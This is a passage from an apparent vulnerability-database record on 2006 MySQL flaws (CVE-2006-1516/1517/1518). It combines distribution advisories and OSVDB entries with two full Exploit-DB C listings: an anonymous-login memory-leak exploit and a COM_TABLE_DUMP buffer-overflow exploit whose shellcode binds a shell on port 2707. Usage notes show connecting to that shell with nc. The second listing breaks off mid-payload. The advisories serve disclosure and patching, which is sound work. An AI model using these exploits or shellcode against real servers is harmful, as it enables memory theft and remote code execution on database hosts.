"AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-09T19:46:55", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1517", "CVE-2006-1516"], "description": "Stefano Di Paola discovered an information leak in the login packet \nparser. By sending a specially crafted malformed login packet, a \nremote attacker could exploit this to read a random piece of memory, \nwhich could potentially reveal sensitive data. (CVE-2006-1516)\n\nStefano Di Paola also found a similar information leak in the parser \nfor the COM_TABLE_DUMP request. 
(CVE-2006-1517)", "edition": 5, "modified": "2006-05-08T00:00:00", "published": "2006-05-08T00:00:00", "id": "USN-283-1", "href": "https://ubuntu.com/security/notices/USN-283-1", "title": "MySQL vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:49", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1517", "CVE-2006-1516"], "edition": 1, "description": "### Background\n\nMySQL is a popular multi-threaded, multi-user SQL database server. \n\n### Description\n\nThe processing of the COM_TABLE_DUMP command by a MySQL server fails to properly validate packets that arrive from the client via a network socket. \n\n### Impact\n\nBy crafting specific malicious packets an attacker could gather confidential information from the memory of a MySQL server process, for example results of queries by other users or applications. By using PHP code injection or similar techniques it would be possible to exploit this flaw through web applications that use MySQL as a database backend. \n\nNote that on 5.x versions it is possible to overwrite the stack and execute arbitrary code with this technique. Users of MySQL 5.x are urged to upgrade to the latest available version. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll MySQL users should upgrade to the latest version. 
\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/mysql-4.0.27\"", "modified": "2006-05-15T00:00:00", "published": "2006-05-11T00:00:00", "id": "GLSA-200605-13", "href": "https://security.gentoo.org/glsa/200605-13", "type": "gentoo", "title": "MySQL: Information leakage", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "centos": [{"lastseen": "2019-12-20T18:24:56", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1517", "CVE-2006-3081", "CVE-2006-0903", "CVE-2006-2753", "CVE-2006-4380", "CVE-2006-1516"], "description": "**CentOS Errata and Security Advisory** CESA-2006:0544\n\n\nMySQL is a multi-user, multi-threaded SQL database server. MySQL is a\r\nclient/server implementation consisting of a server daemon (mysqld) and\r\nmany different client programs and libraries.\r\n\r\nA flaw was found in the way the MySQL mysql_real_escape() function escaped\r\nstrings when operating in a multibyte character encoding. An attacker\r\ncould provide an application a carefully crafted string containing\r\ninvalidly-encoded characters which may be improperly escaped, leading to\r\nthe injection of malicious SQL commands. (CVE-2006-2753)\r\n\r\nAn information disclosure flaw was found in the way the MySQL server\r\nprocessed malformed usernames. An attacker could view a small portion\r\nof server memory by supplying an anonymous login username which was not\r\nnull terminated. (CVE-2006-1516)\r\n\r\nAn information disclosure flaw was found in the way the MySQL server\r\nexecuted the COM_TABLE_DUMP command. An authenticated malicious user could\r\nsend a specially crafted packet to the MySQL server which returned\r\nrandom unallocated memory. (CVE-2006-1517)\r\n\r\nA log file obfuscation flaw was found in the way the mysql_real_query()\r\nfunction creates log file entries. 
An attacker with the ability to call\r\nthe mysql_real_query() function against a mysql server can obfuscate the\r\nentry the server will write to the log file. However, an attacker needed\r\nto have complete control over a server in order to attempt this attack.\r\n(CVE-2006-0903)\r\n\r\nThis update also fixes numerous non-security-related flaws, such as\r\nintermittent authentication failures.\r\n\r\nAll users of mysql are advised to upgrade to these updated packages\r\ncontaining MySQL version 4.1.20, which is not vulnerable to these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-June/024989.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-June/024990.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-June/024998.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-June/024999.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-June/025000.html\n\n**Affected packages:**\nmysql\nmysql-bench\nmysql-devel\nmysql-server\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2006-0544.html", "edition": 6, "modified": "2006-06-10T06:39:28", "published": "2006-06-09T17:37:00", "href": "http://lists.centos.org/pipermail/centos-announce/2006-June/024989.html", "id": "CESA-2006:0544", "title": "mysql security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-12-11T13:33:05", "bulletinFamily": "unix", "cvelist": ["CVE-2006-0903", "CVE-2006-1516", "CVE-2006-1517", "CVE-2006-2753", "CVE-2006-3081", "CVE-2006-4380"], "description": "MySQL is a multi-user, multi-threaded SQL database server. MySQL is a\r\nclient/server implementation consisting of a server daemon (mysqld) and\r\nmany different client programs and libraries.\r\n\r\nA flaw was found in the way the MySQL mysql_real_escape() function escaped\r\nstrings when operating in a multibyte character encoding. 
An attacker\r\ncould provide an application a carefully crafted string containing\r\ninvalidly-encoded characters which may be improperly escaped, leading to\r\nthe injection of malicious SQL commands. (CVE-2006-2753)\r\n\r\nAn information disclosure flaw was found in the way the MySQL server\r\nprocessed malformed usernames. An attacker could view a small portion\r\nof server memory by supplying an anonymous login username which was not\r\nnull terminated. (CVE-2006-1516)\r\n\r\nAn information disclosure flaw was found in the way the MySQL server\r\nexecuted the COM_TABLE_DUMP command. An authenticated malicious user could\r\nsend a specially crafted packet to the MySQL server which returned\r\nrandom unallocated memory. (CVE-2006-1517)\r\n\r\nA log file obfuscation flaw was found in the way the mysql_real_query()\r\nfunction creates log file entries. An attacker with the ability to call\r\nthe mysql_real_query() function against a mysql server can obfuscate the\r\nentry the server will write to the log file. However, an attacker needed\r\nto have complete control over a server in order to attempt this attack.\r\n(CVE-2006-0903)\r\n\r\nThis update also fixes numerous non-security-related flaws, such as\r\nintermittent authentication failures.\r\n\r\nAll users of mysql are advised to upgrade to these updated packages\r\ncontaining MySQL version 4.1.20, which is not vulnerable to these issues.", "modified": "2017-09-08T11:51:30", "published": "2006-06-09T04:00:00", "id": "RHSA-2006:0544", "href": "https://access.redhat.com/errata/RHSA-2006:0544", "type": "redhat", "title": "(RHSA-2006:0544) mysql security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:21", "bulletinFamily": "software", "cvelist": ["CVE-2006-1516"], "edition": 1, "description": "## Solution Description\nUpgrade to version 4.1.19, 5.0.21, 5.1.10 or higher, as it has been reported to fix this vulnerability. 
An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.mysql.com/\nVendor Specific News/Changelog Entry: http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html\nVendor Specific News/Changelog Entry: http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html\nVendor Specific News/Changelog Entry: http://dev.mysql.com/doc/connector/j/en/news-5-0-21.html\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2006/0028/)\n[Vendor Specific Advisory URL](http://www.novell.com/linux/security/advisories/2006-06-02.html)\nSecurity Tracker: 1016017\n[Secunia Advisory ID:19929](https://secuniaresearch.flexerasoftware.com/advisories/19929/)\n[Secunia Advisory ID:20002](https://secuniaresearch.flexerasoftware.com/advisories/20002/)\n[Secunia Advisory ID:20076](https://secuniaresearch.flexerasoftware.com/advisories/20076/)\n[Secunia Advisory ID:20073](https://secuniaresearch.flexerasoftware.com/advisories/20073/)\n[Secunia Advisory ID:20241](https://secuniaresearch.flexerasoftware.com/advisories/20241/)\n[Secunia Advisory ID:20871](https://secuniaresearch.flexerasoftware.com/advisories/20871/)\n[Secunia Advisory ID:20223](https://secuniaresearch.flexerasoftware.com/advisories/20223/)\n[Secunia Advisory ID:20253](https://secuniaresearch.flexerasoftware.com/advisories/20253/)\n[Secunia Advisory ID:20333](https://secuniaresearch.flexerasoftware.com/advisories/20333/)\n[Secunia Advisory ID:20457](https://secuniaresearch.flexerasoftware.com/advisories/20457/)\n[Secunia Advisory ID:20762](https://secuniaresearch.flexerasoftware.com/advisories/20762/)\n[Secunia Advisory ID:20424](https://secuniaresearch.flexerasoftware.com/advisories/20424/)\n[Secunia Advisory ID:20625](https://secuniaresearch.flexerasoftware.com/advisories/20625/)\n[Related OSVDB ID: 25228](https://vulners.com/osvdb/OSVDB:25228)\n[Related OSVDB ID: 25227](https://vulners.com/osvdb/OSVDB:25227)\nRedHat RHSA: RHSA-2006:0544\nOther Advisory URL: 
http://www.us.debian.org/security/2006/dsa-1071\nOther Advisory URL: http://www.debian.org/security/2006/dsa-1073\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:084\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200605-13.xml\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1079\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.599377\nOther Advisory URL: http://www.wisec.it/vulns.php?page=7\nOther Advisory URL: http://www.ubuntu.com/usn/usn-283-1\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Jun/0011.html\nOther Advisory URL: http://www.ubuntu.com/usn/usn-306-1\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0041.html\nFrSIRT Advisory: ADV-2006-1633\n[CVE-2006-1516](https://vulners.com/cve/CVE-2006-1516)\n", "modified": "2006-05-02T08:02:33", "published": "2006-05-02T08:02:33", "href": "https://vulners.com/osvdb/OSVDB:25226", "id": "OSVDB:25226", "title": "MySQL Malformed Login Packet Remote Memory Disclosure", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:21", "bulletinFamily": "software", "cvelist": ["CVE-2006-1517"], "edition": 1, "description": "## Vulnerability Description\nMySQL contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious client sends a specially crafted invalid login or COM_TABLE_DUMP packets, which will disclose arbitrary memory in error messages resulting in a loss of confidentiality.\n## Solution Description\nUpgrade to version 4.1.19, 5.0.21, 5.1.10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nMySQL contains a flaw that may lead to an unauthorized information disclosure. 
The issue is triggered when a malicious client sends a specially crafted invalid login or COM_TABLE_DUMP packets, which will disclose arbitrary memory in error messages resulting in a loss of confidentiality.\n## References:\nVendor URL: http://www.mysql.com/\nVendor Specific News/Changelog Entry: http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html\nVendor Specific News/Changelog Entry: http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html\nVendor Specific News/Changelog Entry: http://dev.mysql.com/doc/connector/j/en/news-5-0-21.html\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2006/0028/)\n[Vendor Specific Advisory URL](http://www.novell.com/linux/security/advisories/2006-06-02.html)\nSecurity Tracker: 1016016\n[Secunia Advisory ID:19929](https://secuniaresearch.flexerasoftware.com/advisories/19929/)\n[Secunia Advisory ID:20002](https://secuniaresearch.flexerasoftware.com/advisories/20002/)\n[Secunia Advisory ID:20076](https://secuniaresearch.flexerasoftware.com/advisories/20076/)\n[Secunia Advisory ID:20073](https://secuniaresearch.flexerasoftware.com/advisories/20073/)\n[Secunia Advisory ID:20241](https://secuniaresearch.flexerasoftware.com/advisories/20241/)\n[Secunia Advisory ID:20871](https://secuniaresearch.flexerasoftware.com/advisories/20871/)\n[Secunia Advisory ID:20223](https://secuniaresearch.flexerasoftware.com/advisories/20223/)\n[Secunia Advisory ID:20253](https://secuniaresearch.flexerasoftware.com/advisories/20253/)\n[Secunia Advisory ID:20333](https://secuniaresearch.flexerasoftware.com/advisories/20333/)\n[Secunia Advisory ID:20457](https://secuniaresearch.flexerasoftware.com/advisories/20457/)\n[Secunia Advisory ID:20762](https://secuniaresearch.flexerasoftware.com/advisories/20762/)\n[Secunia Advisory ID:20424](https://secuniaresearch.flexerasoftware.com/advisories/20424/)\n[Secunia Advisory ID:20625](https://secuniaresearch.flexerasoftware.com/advisories/20625/)\n[Related OSVDB ID: 
25227](https://vulners.com/osvdb/OSVDB:25227)\n[Related OSVDB ID: 25226](https://vulners.com/osvdb/OSVDB:25226)\nRedHat RHSA: RHSA-2006:0544\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1071\nOther Advisory URL: http://www.debian.org/security/2006/dsa-1073\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:084\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200605-13.xml\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1079\nOther Advisory URL: http://www.wisec.it/vulns.php?page=8\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.599377\nOther Advisory URL: http://www.ubuntu.com/usn/usn-283-1\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Jun/0011.html\nOther Advisory URL: http://www.ubuntu.com/usn/usn-306-1\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0042.html\nGeneric Exploit URL: http://www.wisec.it/Download/vulns/my_com_table_dump_exploit.c\nFrSIRT Advisory: ADV-2006-1633\n[CVE-2006-1517](https://vulners.com/cve/CVE-2006-1517)\nBugtraq ID: 17780\n", "modified": "2006-05-02T08:02:33", "published": "2006-05-02T08:02:33", "href": "https://vulners.com/osvdb/OSVDB:25228", "id": "OSVDB:25228", "title": "MySQL Crafted COM_TABLE_DUMP Request Arbitrary Memory Disclosure", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:21", "bulletinFamily": "software", "cvelist": ["CVE-2006-1518"], "edition": 1, "description": "## Solution Description\nUpgrade to version 4.1.19, 5.0.21, 5.1.10 or higher, as it has been reported to fix this vulnerability. 
An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.mysql.com/\nVendor Specific News/Changelog Entry: http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html\nVendor Specific News/Changelog Entry: http://dev.mysql.com/doc/connector/j/en/news-5-0-21.html\n[Vendor Specific Advisory URL](http://www.novell.com/linux/security/advisories/2006-06-02.html)\nSecurity Tracker: 1016016\n[Secunia Advisory ID:19929](https://secuniaresearch.flexerasoftware.com/advisories/19929/)\n[Secunia Advisory ID:20241](https://secuniaresearch.flexerasoftware.com/advisories/20241/)\n[Secunia Advisory ID:20871](https://secuniaresearch.flexerasoftware.com/advisories/20871/)\n[Secunia Advisory ID:20253](https://secuniaresearch.flexerasoftware.com/advisories/20253/)\n[Secunia Advisory ID:20333](https://secuniaresearch.flexerasoftware.com/advisories/20333/)\n[Secunia Advisory ID:20457](https://secuniaresearch.flexerasoftware.com/advisories/20457/)\n[Secunia Advisory ID:20762](https://secuniaresearch.flexerasoftware.com/advisories/20762/)\n[Related OSVDB ID: 25226](https://vulners.com/osvdb/OSVDB:25226)\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1071\nOther Advisory URL: http://www.debian.org/security/2006/dsa-1073\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1079\nOther Advisory URL: http://www.wisec.it/vulns.php?page=8\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Jun/0011.html\nOther Advisory URL: http://www.ubuntu.com/usn/usn-306-1\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0042.html\nFrSIRT Advisory: ADV-2006-1633\n[CVE-2006-1518](https://vulners.com/cve/CVE-2006-1518)\n", "modified": "2006-05-02T08:02:33", "published": "2006-05-02T08:02:33", "href": "https://vulners.com/osvdb/OSVDB:25227", "id": "OSVDB:25227", "title": "MySQL COM_TABLE_DUMP Packet Overflow", "type": "osvdb", "cvss": {"score": 6.5, "vector": 
"AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T14:47:45", "description": "MySQL (<= 4.1.18, 5.0.20) Local/Remote Information Leakage Exploit. CVE-2006-1516. Remote exploit for linux platform", "published": "2006-05-02T00:00:00", "type": "exploitdb", "title": "MySQL <= 4.1.18 / 5.0.20 - Local/Remote Information Leakage Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-1516"], "modified": "2006-05-02T00:00:00", "id": "EDB-ID:1742", "href": "https://www.exploit-db.com/exploits/1742/", "sourceData": "/* ****************************************************************\n \n April 21.st 2006\n \n my_anon_db_leak.c\n\n MySql Anonimous Login Memory Leak \n \n MySql <= 5.0.20\n \n MySql <= 4.1.x\n \n copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it)\n \n GPL 2.0\n ****************************************************************\n \n Disclaimer:\n\n In no event shall the author be liable for any damages \n whatsoever arising out of or in connection with the use \n or spread of this information. 
\n Any use of this information is at the user's own risk.\n \n ****************************************************************\n Compile with:\n gcc my_anon_db_leak.c -o my_anon_db_leak\n \n usage:\n my_anon_db_leak [-s path/to/socket] [-h hostname_or_ip] [-p port_num] [-n db_len]\n \n \n*/\n\n\n#include <sys/types.h>\n/* we need MSG_WAITALL - that's why this ugly #ifdef, why doesn't glibc2\nhave MSG_WAITALL in its <socketbits.h> ??\n*/\n\n#ifdef __linux__\n#include <linux/socket.h>\n#else\n#include <sys/socket.h>\n#endif\n#include <sys/socket.h>\n#include <sys/un.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <signal.h>\n#include <fcntl.h>\n#include <sys/file.h>\n#include <errno.h>\n#include <unistd.h>\n#include <netinet/in.h>\t\t/* sockaddr_in{} and other Internet defns */\n#include <netdb.h>\t\t/* needed by gethostbyname */\n#include <arpa/inet.h>\t\t/* needed by inet_ntoa */\n\n\nchar anon_pckt[] = {\n 0x3d, 0x00, 0x00, 0x01, 0x0d, 0xa6, 0x03, 0x00, 0x00, 0x00, 0x00, 0x01, 0x08, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x14, 0x99, 0xdb, 0x54, 0xb6, 0x6a,\n 0xd7, 0xc2, 0x86, 0x4c, 0x50, 0xa8, 0x14, 0xfe, 0x2e, 0x98, 0x27, 0x72, 0x0d, 0xad, 0x45, 0x73,\n 0x00\n};\t\t\t\t// len=16*4+1=65;\n\n\nint anon_pckt_len = 65;\n\n#define USOCK \"/tmp/mysql2.sock\"\n\nint\ntcp_conn (char *hostname, int port)\n{\n\n int sockfd;\n int n;\n struct sockaddr_in servaddr;\n\n struct hostent *hp;\n\n\n\n if ((hp = gethostbyname (hostname)) == 0)\n {\n perror (\"gethostbyname\");\n exit (0);\n }\n\n if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)\n {\n perror (\"socket\");\n exit (1);\n }\n\n bzero ((char *) &servaddr, sizeof (servaddr));\n servaddr.sin_family = AF_INET;\n servaddr.sin_port = htons (port);\n\n memcpy (&servaddr.sin_addr, hp->h_addr, hp->h_length);\n if (servaddr.sin_addr.s_addr <= 0)\n {\n perror 
(\"bad address after gethostbyname\");\n exit (1);\n }\n if (connect (sockfd, (struct sockaddr *) &servaddr, sizeof (servaddr)) < 0)\n {\n perror (\"connect\");\n exit (1);\n }\n return sockfd;\n}\n\nint\nunix_conn (char *path)\n{\n int fd, len;\n struct sockaddr_un sa;\n\n fd = socket (PF_UNIX, SOCK_STREAM, 0);\n\n if (fd < 0)\n {\n perror (\"cli: socket(PF_UNIX,SOCK_STREAM)\");\n exit (1);\n }\n\n sa.sun_family = AF_UNIX;\n strcpy (sa.sun_path, path);\n len = sizeof (sa);\n if (connect (fd, (struct sockaddr *) &sa, len) < 0)\n {\n perror (\"cli: connect()\");\n exit (1);\n }\n return fd;\n}\n\nint\nmain (int argc, char *argv[])\n{\n int fd;\n int i, ret;\n char packet[65535];\n char *path;\n char *host;\n int port = 3306;\n char buf[65535];\n int db_len = 0;\n int pckt_len = anon_pckt_len;\n int unix_sock = 1;\n char c;\n\n path = strdup (USOCK);\n host = strdup (\"127.0.0.1\");\n\n opterr = 0;\n\n while ((c = getopt (argc, argv, \"s:h:p:n:\")) != -1)\n switch (c)\n {\n case 's':\n\tpath = strdup (optarg);\n\tunix_sock = 1;\n\tbreak;\n case 'h':\n\thost = strdup (optarg);\n\tunix_sock = 0;\n\tbreak;\n case 'p':\n\tport = atoi (optarg);\n\tunix_sock = 0;\n\tbreak;\n case 'n':\n\tdb_len = atoi (optarg);\n\tbreak;\n\n default:\n\tbreak;\n }\n\n\n bzero (packet, 65535);\n\n pckt_len = anon_pckt_len + db_len;\n printf (\"%d\\n\", pckt_len);\n\n for (i = 0; i < pckt_len; i++)\n packet[i] = anon_pckt[i];\n\n if (db_len)\n for (i = anon_pckt_len - 2; i < pckt_len; i++)\n packet[i] = 'A';\n\n packet[pckt_len - 1] = '\\0';\n\n packet[0] = (char) (anon_pckt[0] + db_len) & 0xff;\n packet[1] = (char) ((anon_pckt[0] + db_len) >> 8) & 0xff;\n for (i = 0; i < pckt_len; i++)\n printf (\" %.2x%c\", (unsigned char) packet[i],\n\t ((i + 1) % 16 ? 
' ' : '\\n'));\n printf (\"\\n\");\n\n\n if (unix_sock)\n fd = unix_conn (path);\n else\n fd = tcp_conn (host, port);\n\n sleep (1);\n ret = recv (fd, buf, 65535, 0);\n if (send (fd, packet, pckt_len, 0) != pckt_len)\n {\n perror (\"cli: send(anon_pckt)\");\n exit (1);\n }\n\n ret = recv (fd, buf, 65535, 0);\n for (i = 0; i < ret; i++)\n printf (\"%c\", (isalpha (buf[i]) ? buf[i] : '.'));\n printf (\"\\n\");\n return 0;\n}\n\n// milw0rm.com [2006-05-02]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/1742/"}, {"lastseen": "2016-01-31T14:47:38", "description": "MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit. CVE-2006-1518. Remote exploit for linux platform", "published": "2006-05-02T00:00:00", "type": "exploitdb", "title": "MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-1518"], "modified": "2006-05-02T00:00:00", "id": "EDB-ID:1741", "href": "https://www.exploit-db.com/exploits/1741/", "sourceData": "/* ****************************************************************\n \n April 21.st 2006\n \n my_exploit.c\n\n MySql COM_TABLE_DUMP Memory Leak & MySql remote B0f\n \n MySql <= 5.0.20\n \n MySql COM_TABLE_DUMP Memory Leak \n \n MySql <= 4.x.x\n \n copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it)\n \n GPL 2.0\n ****************************************************************\n \n Disclaimer:\n\n In no event shall the author be liable for any damages \n whatsoever arising out of or in connection with the use \n or spread of this information. 
\n Any use of this information is at the user's own risk.\n \n ****************************************************************\n \n compile with:\n gcc -Imysql-5.0.20-src/include/ my_com_table_dump_exploit.c -Lmysql-5.0.20/lib/mysql/ -lmysqlclient -o my_exploit\n\n Then:\n\n my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x]\n\n -H: this Help;\n -i: Information leak exploit (shows the content of MySql Server Memory)\n -x: shows c/s communication output in hexadecimal\n -t: hexadecimal table_list struct address (by default we try to find it automatically)\n -a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338)\n -u: mysql username (anonymous too ;)\n -p: mysql userpass (if you need it)\n -s: the socket path if is a unix socket\n -h: hostname or IP address\n -P: port (default 3306)\n\n\n Example_1 - Memoryleak: my_exploit -s socketpath -u username -i \n\n Example_2 - Remote Shell: my_exploit -h 127.0.0.1 -u username -a 0x8b1f468\n\n For memory leak:\n\n my_exploit -i [-u user] [-p password] [-s socket|[-h hostname [-P port]]]\n\n For the bindshell to port 2707\n my_exploit [-t 0xtableaddress] [-a 0xthdaddress] [-u user] [-p password] [-s socket|[-h hostname [-P port]]]\n\n then from another shell:\n nc 127.0.0.1 2707\n id\n uid=78(mysql) gid=78(mysql) groups=78(mysql)\n\n\n\n*/\n\n#include <stdio.h>\n#include <mysql.h>\n#include <unistd.h>\n\n\n\n// we need to know the thread struct address pointer and the table_list.\n// these are defaults, change them from command line.\nint thd = 0x8b1b338;\nint tbl = 0x8b3a880;\n\n#define USOCK2 \"/tmp/mysql.sock\"\n\nchar addr_tdh[4];\nchar addr_tbl[4];\nchar addr_ret[4];\n\n// constants to overwrite packet with addresses for table_list thread and our shell.\n#define TBL_POS 182\n#define THD_POS 178\n#define RET_POS 174\n#define SHL_POS 34\n\n// bindshell spawns a shell with on port 2707\nchar shcode[] = {\n 0x6a, 0x66, 0x58, 0x6a, 
0x01, 0x5b, 0x99, 0x52, 0x53, 0x6a, 0x02, 0x89\t// 12\n ,0xe1, 0xcd, 0x80, 0x52, 0x43, 0x68, 0xff, 0x02, 0x0a, 0x93, 0x89, 0xe1\n ,0x6a, 0x10, 0x51, 0x50, 0x89, 0xe1, 0x89, 0xc6, 0xb0, 0x66, 0xcd, 0x80\n ,0x43, 0x43, 0xb0, 0x66, 0xcd, 0x80, 0x52, 0x56, 0x89, 0xe1, 0x43, 0xb0\n ,0x66, 0xcd, 0x80, 0x89, 0xd9, 0x89, 0xc3, 0xb0, 0x3f, 0x49, 0xcd, 0x80\n ,0x41, 0xe2, 0xf8, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f\n ,0x62, 0x69, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80\t// 12*7= 84\n};\n\nint tmp_idx = 0;\n\nint dump_packet_len = 7;\nchar table_dump_packet[] = { 0x03, 0x00, 0x00, 0x00, 0x13, 0x02, 0x73 };\n\nint payload_len = 371;\n// header packet + select '1234567890...etc'\nchar query_payload[] = {\n 0x6f, 0x01, 0x00, 0x00, 0x03, 0x73, 0x65, 0x6c, 0x65, 0x63, 0x74, 0x20, 0x27, 0x31, 0x32, 0x33\t// 16 Some junk from position 6 ...\n , 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x31, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36\t// 32\n , 0x37, 0x38, 0x39, 0x30, 0x5f, 0x32, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39\t// 48\n , 0x30, 0x5f, 0x33, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x34\t// 64\n , 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x35, 0x5f, 0x31, 0x32\t// 72\n , 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x36, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35\t// 88\n , 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x37, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38\t// 94\n , 0x39, 0x30, 0x5f, 0x38, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x6a\t// 112\n , 0x0b, 0x58, 0x99, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69, 0x89, 0xe3\t// 128 endsh 118\n , 0x52, 0x53, 0x89, 0xe1, 0xcd, 0x80, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4c, 0x4d\t// 144\n , 0x4e, 0x4f, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x5a, 0x5f, 0x61, 0x61, 0x62, 0x62, 0x63\t// 160\n , 0x63, 0x64, 0x64, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 
